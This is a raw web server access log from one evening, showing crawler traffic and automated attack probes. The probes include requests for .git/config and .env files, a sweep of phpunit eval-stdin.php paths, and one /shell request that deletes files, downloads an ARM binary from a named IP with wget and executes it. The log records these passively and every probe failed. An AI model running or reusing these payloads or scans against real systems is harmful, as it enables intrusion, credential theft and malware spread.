156.59.198.135 - - [16/Feb/2025:19:08:33 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115647.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Feb/2025:19:12:43 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103181103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Feb/2025:19:23:46 +0100] "GET /renault.activities.at/htdocs/log/cron/importLogisticData_3116318.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Feb/2025:19:27:46 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11483079.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
64.112.74.158 - - [16/Feb/2025:19:29:11 +0100] "GET /web HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
156.59.198.135 - - [16/Feb/2025:19:42:04 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908020803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Feb/2025:20:03:00 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3114907.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Feb/2025:20:07:01 +0100] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115441.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.51 - - [16/Feb/2025:20:08:09 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [16/Feb/2025:20:11:01 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106100903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.148.10.186 - - [16/Feb/2025:20:11:20 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
45.148.10.186 - - [16/Feb/2025:20:11:25 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36"
198.235.24.58 - - [16/Feb/2025:20:11:58 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [16/Feb/2025:20:19:02 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101271203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [16/Feb/2025:20:29:33 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
185.93.89.118 - - [16/Feb/2025:20:32:34 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 395 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:32:38 +0100] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 391 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:32:42 +0100] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 387 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:32:47 +0100] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 383 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:32:51 +0100] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:32:55 +0100] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:32:59 +0100] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 392 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:03 +0100] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 388 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:07 +0100] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 384 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:11 +0100] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 380 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:15 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:19 +0100] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 388 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:23 +0100] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 384 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:27 +0100] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 380 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:31 +0100] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 376 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:35 +0100] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:40 +0100] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 403 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:44 +0100] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:48 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:52 +0100] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:33:56 +0100] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:00 +0100] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:04 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:08 +0100] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 398 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:13 +0100] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:17 +0100] "GET /all/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:21 +0100] "GET /advanced/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 404 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:25 +0100] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:29 +0100] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:33 +0100] "GET /back/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:38 +0100] "GET /backend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 403 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:42 +0100] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:46 +0100] "GET /beta/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:50 +0100] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:54 +0100] "GET /blog/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 404 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:34:58 +0100] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:02 +0100] "GET /config/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:06 +0100] "GET /core/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:10 +0100] "GET /core/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 404 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:14 +0100] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:17 +0100] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:21 +0100] "GET /dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:25 +0100] "GET /develop/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 403 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:29 +0100] "GET /ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 398 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:33 +0100] "GET /ecc/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:37 +0100] "GET /git/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:42 +0100] "GET /lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:46 +0100] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 403 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:50 +0100] "GET /laravel_api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 407 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:55 +0100] "GET /laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 407 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:35:58 +0100] "GET /live/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:02 +0100] "GET /local/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:06 +0100] "GET /modules/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 403 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:10 +0100] "GET /new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:13 +0100] "GET /old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:17 +0100] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:21 +0100] "GET /pid/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:25 +0100] "GET /pkm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:29 +0100] "GET /pms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:32 +0100] "GET /portal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:36 +0100] "GET /pos/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 392 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:40 +0100] "GET /pos/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:43 +0100] "GET /production/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 410 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:47 +0100] "GET /production/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 406 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:51 +0100] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:36:56 +0100] "GET /server/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:37:00 +0100] "GET /site/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:37:04 +0100] "GET /workspace/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 405 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
185.93.89.118 - - [16/Feb/2025:20:37:08 +0100] "GET /web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
193.68.89.10 - - [16/Feb/2025:20:37:37 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.68.89.51 - - [16/Feb/2025:20:42:19 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
57.129.64.237 - - [16/Feb/2025:20:58:45 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
156.59.198.135 - - [16/Feb/2025:21:01:53 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10843241.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Feb/2025:21:17:54 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111290903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
196.251.69.18 - - [16/Feb/2025:21:23:31 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:38.0) Gecko/20100101 Firefox/38.0 SeaMonkey/2.35"
156.59.198.136 - - [16/Feb/2025:21:24:27 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115047.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.255.166.90 - - [16/Feb/2025:21:34:46 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [16/Feb/2025:21:42:07 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12383932.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Feb/2025:22:00:56 +0100] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3114846.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
196.251.66.193 - - [16/Feb/2025:22:12:11 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
196.251.66.193 - - [16/Feb/2025:22:12:46 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"
141.255.166.90 - - [16/Feb/2025:22:18:13 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [16/Feb/2025:22:20:57 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10930900.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [16/Feb/2025:22:24:32 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [16/Feb/2025:22:24:57 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11504231.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Feb/2025:22:28:57 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11214601.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.51 - - [16/Feb/2025:22:29:11 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [16/Feb/2025:22:32:58 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115940.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
216.244.66.235 - - [16/Feb/2025:22:44:20 +0100] "GET /robots.txt HTTP/1.1" 404 375 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
156.59.198.136 - - [16/Feb/2025:22:47:42 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10668168.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
8.152.208.190 - - [16/Feb/2025:22:55:15 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.90.162.234/wdjkalwww/telnet.arm5;chmod+777+/tmp/telnet.arm5;sh+/tmp/telnet.arm5" 400 383 "-" "-"
216.244.66.235 - - [16/Feb/2025:22:57:37 +0100] "GET /?p=1 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
156.59.198.135 - - [16/Feb/2025:23:03:44 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3114933.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Feb/2025:23:07:43 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115589.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Feb/2025:23:11:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010101003_RenOrder.xml HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Feb/2025:23:15:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102041803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.144.21.56 - - [16/Feb/2025:23:21:58 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
195.144.21.56 - - [16/Feb/2025:23:21:58 +0100] "GET /robots.txt HTTP/1.1" 404 355 "-" "-"
